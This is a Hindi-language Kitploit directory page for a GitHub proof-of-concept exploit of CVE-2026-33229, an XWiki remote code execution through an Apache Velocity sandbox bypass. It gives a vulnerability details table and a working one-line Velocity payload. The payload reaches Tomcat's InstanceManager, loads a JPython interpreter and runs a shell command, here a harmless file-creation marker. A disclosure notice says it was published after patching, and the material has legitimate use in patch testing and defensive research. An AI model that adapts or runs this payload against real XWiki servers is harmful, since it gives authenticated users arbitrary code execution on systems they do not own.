Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-33229 — # CVE-2026-33229 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट Apache Velocity सैंडबॉक्स बायपास के माध्यम से XWiki RCE, तकनीकी विवरण और एक कार्यशील पेलोड के साथ। | Kitploit
उपकरण/GitHubGitHub/azefzafyoussef/cve-2026-33229
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेलोड डेवलपमेंट
GitHubazefzafyoussef/cve-2026-33229

CVE-2026-33229

# CVE-2026-33229 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट Apache Velocity सैंडबॉक्स बायपास के माध्यम से XWiki RCE, तकनीकी विवरण और एक कार्यशील पेलोड के साथ।

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-33229 — Apache Velocity सैंडबॉक्स बाईपास के माध्यम से XWiki RCE

CVE Severity Status

XWiki Platform में एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता जो स्क्रिप्टिंग अनुमतियों वाले एक प्रमाणित उपयोगकर्ता को Apache Velocity सैंडबॉक्स को पूरी तरह से बाईपास करने की अनुमति देती है — Java Reflection की कोई आवश्यकता नहीं — Velocity संदर्भ में पहले से मौजूद प्री-इंस्टैंशिएटेड ऑब्जेक्ट्स को ट्रैवर्स करके।

📄 पूर्ण तकनीकी विवरण: youssefazefzaf.com/posts/cve


विवरण

फ़ील्डमान
CVE IDCVE-2026-33229
प्रभावित उत्पादXWiki Platform
घटकVelocity मैक्रो रेंडरर, पेज शीर्षक पैरामीटर
आवश्यक विशेषाधिकारप्रमाणित + स्क्रिप्ट अनुमति
प्रभावरिमोट कोड एक्ज़ीक्यूशन
GHSAGHSA-h259-74h5-4rh9
खोजा गया7 नवंबर 2025
पैच किया गया10 दिसंबर 2025
प्रकट किया गया8 अप्रैल 2026

प्रूफ ऑफ कॉन्सेप्ट

root@kitploit:~
$request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')") 

जिम्मेदार प्रकटीकरण सूचना: PoC पैच उपलब्ध होने के बाद प्रकाशित किया गया। उन सिस्टमों के विरुद्ध उपयोग न करें जिनके आप स्वामी नहीं हैं।

टूल डाउनलोड करें